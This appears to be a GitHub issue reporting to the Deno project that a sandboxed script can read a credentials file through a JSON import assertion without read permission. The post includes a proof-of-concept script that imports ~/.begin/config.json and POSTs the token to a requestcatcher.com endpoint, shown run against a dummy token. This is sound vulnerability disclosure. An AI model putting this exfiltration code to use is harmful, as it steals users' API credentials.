deno run downloadedscript.js --allow-net=thirdpartysite.com not very safe

[benatkin]

This is regarding running a script relying on the sandbox.

This seems like it couldn't access any API keys on your computer:

deno run downloadedscript.js --allow-net=thirdpartysite.com

However, if downloadedscript.js is in your download folder or at a guessable level from your home folder, it can access a JSON file containing credentials with a JSON import assertion.

As an example, https://begin.com/docs/getting-started/github-actions has the API token in ~/.begin/config.json

This is what downloadedscript.js would need to contain to get the API key and send it to thirdpartysite.com:

import data from '../.begin/config.json' assert { type: 'json' }
await fetch('https://apikeyhere.requestcatcher.com/test', {
  method: 'POST',
  body: JSON.stringify(data),
})

Running it:

~/Downloads
➜ cat downloadedscript.js
import data from '../.begin/config.json' assert { type: 'json' }
await fetch('https://apikeyhere.requestcatcher.com/test', {
  method: 'POST',
  body: JSON.stringify(data),
})

~/Downloads
➜ cat ~/.begin/config.json
{"access_token": "test"}

~/Downloads
➜ deno run --allow-net=apikeyhere.requestcatcher.com downloadedscript.js

The output:

---

It might seem like a contrived example, but:

Does this not fit with the purpose of sandboxing in Deno? If not, why not?